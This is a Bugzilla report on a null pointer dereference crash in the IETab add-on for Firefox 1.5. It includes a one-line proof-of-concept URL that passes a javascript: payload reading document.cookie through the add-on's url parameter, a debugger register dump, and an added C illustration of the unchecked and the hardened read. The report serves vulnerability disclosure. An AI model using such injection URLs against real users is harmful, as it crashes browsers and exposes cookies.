Firefox (with IETab Plugin) Null Pointer Dereferences Bug

Status: RESOLVED INVALID (defect)
Reported: 13 years ago; last updated: 11 years ago
Reporter: d3basis.m0hanty (Unassigned)
Firefox Tracking Flags: Not tracked

Reporter - Description (13 years ago)
User-Agent:       Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Build Identifier: 

Product: FireFox with IE Tab 

Tested On: 
FireFox Version 1.5.0.3 + IE Tab Version 1.0.9 + Windows (XP / 2K)

Introduction: 
IETab (https://addons.mozilla.org/firefox/1419/) is a recently released (April 12, 2006) plugin for Firefox. It is used to browse IE-only sites under Firefox. Guess what? You can run windowsupdate under Firefox ;-)

Bug Details:
Firefox with IETab installed crashes when the ietab plugin is unable to handle specific JavaScript. It seems to be a null pointer dereference bug. For more details, refer to the PoC section.

Proof-of-Concept:
Copy & paste the following URL into the Firefox address bar and press enter:

chrome://ietab/content/reloaded.html?url=javascript:alert(document.cookie);

Note: This test will not work if IETab is not installed.

The register details after the crash:

(1e4.3e0): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00000000 ecx=019499b4 edx=00000000 esi=7712174b edi=00000000
eip=0192e7dc esp=0012eac4 ebp=00000000 iopl=0         nv up ei pl zr na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=0038  gs=0000             efl=00010246
npietab!NP_GetEntryPoints+0xb8ac:
0192e7dc 668b10           mov     dx,[eax]              ds:0023:00000000=????
0:000> g
(1e4.3e0): Access violation - code c0000005 (!!! second chance !!!)
eax=00000000 ebx=00000000 ecx=019499b4 edx=00000000 esi=7712174b edi=00000000
eip=0192e7dc esp=0012eac4 ebp=00000000 iopl=0         nv up ei pl zr na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=0038  gs=0000             efl=00000246
npietab!NP_GetEntryPoints+0xb8ac:
0192e7dc 668b10           mov     dx,[eax]              ds:0023:00000000=????

For more vulnerabilities: http://hackingspirits.com/vuln-rnd/vuln-rnd.html

Credits:
Debasis Mohanty (aka Tr0y)
www.hackingspirits.com

Reproducible: Always

Steps to Reproduce:
1. Copy & paste the following URL into the Firefox address bar and press enter:
chrome://ietab/content/reloaded.html?url=javascript:alert(document.cookie);

Note: This test will not work if IETab is not installed.
Actual Results:
Access violation in npietab!NP_GetEntryPoints+0xb8ac at mov dx,[eax] with eax=00000000 (register details as given in the Bug Details section).

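The crash dump above is the signature of a plain null pointer dereference: eax is 0 when the plugin executes a 16-bit load (mov dx,[eax]), so it is reading the first wide character of a string pointer that was never set, most likely because the javascript: URL passed in the url= parameter is a scheme the plugin cannot resolve. The following C program is an added illustration, not IETab's code; url_param, resolve_url, first_char_unchecked and first_char_checked are hypothetical names, and the example.test strings are constructed. It shows the unchecked read beside the hardened form that treats a NULL lookup result as "cannot handle this URL" and returns an error to the caller instead.

```c
#include <stddef.h>
#include <string.h>
#include <wchar.h>

/* Pull the value of the "url" query parameter out of a
 * reloaded.html-style address into out; returns NULL if absent. */
static const char *url_param(const char *address, char *out, size_t outlen)
{
    const char *q = strchr(address, '?');
    if (q == NULL) return NULL;
    const char *p = strstr(q + 1, "url=");
    if (p == NULL) return NULL;
    p += 4;
    size_t n = strcspn(p, "&");      /* value ends at '&' or end of string */
    if (n >= outlen) n = outlen - 1; /* never overrun the caller's buffer */
    memcpy(out, p, n);
    out[n] = '\0';
    return out;
}

/* Hypothetical stand-in for a plugin's URL resolver (not IETab's code):
 * returns a wide-string target for schemes it can hand to the embedded
 * browser, and NULL for anything else (javascript:, chrome:, data:, ...).
 * Constructed sample targets. */
static const wchar_t *resolve_url(const char *url)
{
    static const wchar_t http_target[]  = L"http://example.test/";
    static const wchar_t https_target[] = L"https://example.test/";
    if (url == NULL) return NULL;
    if (strncmp(url, "http://", 7) == 0)  return http_target;
    if (strncmp(url, "https://", 8) == 0) return https_target;
    return NULL;
}

/* The crash pattern: a 16-bit load through the returned pointer with no
 * check, i.e. mov dx,[eax] with eax == 0 for an unsupported scheme. */
int first_char_unchecked(const char *url)
{
    const wchar_t *p = resolve_url(url);
    return (int)p[0];
}

/* Hardened form: a NULL lookup result is an error the caller must see,
 * not a pointer to dereference. */
int first_char_checked(const char *url)
{
    const wchar_t *p = resolve_url(url);
    if (p == NULL)
        return -1;
    return (int)p[0];
}

/* Full path from the address bar input to the guarded read: returns the
 * first target character, or -1 when the url parameter is missing or
 * names a scheme the resolver cannot handle. */
int load_address_checked(const char *address)
{
    char url[256];
    if (url_param(address, url, sizeof url) == NULL)
        return -1;
    return first_char_checked(url);
}
```

With the PoC address from this report, load_address_checked() returns -1 because the javascript: scheme is refused up front; the same input through first_char_unchecked() reads address 0 exactly as the dump shows.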
This is a bug in IETab so I've filed it in their bug database over on mozdev.org:
http://bugzilla.mozdev.org/show_bug.cgi?id=14151

Clearing confidential flag because full details are available in public at http://hackingspirits.com/vuln-rnd/ffietab_die.txt

(Note: the "invalid" resolution is not a comment on the problem itself, just that it's filed against the wrong product. I wish we had a better choice of resolutions.)
Group: security
Status: UNCONFIRMED → RESOLVED
Closed: 13 years ago
Resolution: --- → INVALID
Product: Firefox → Toolkit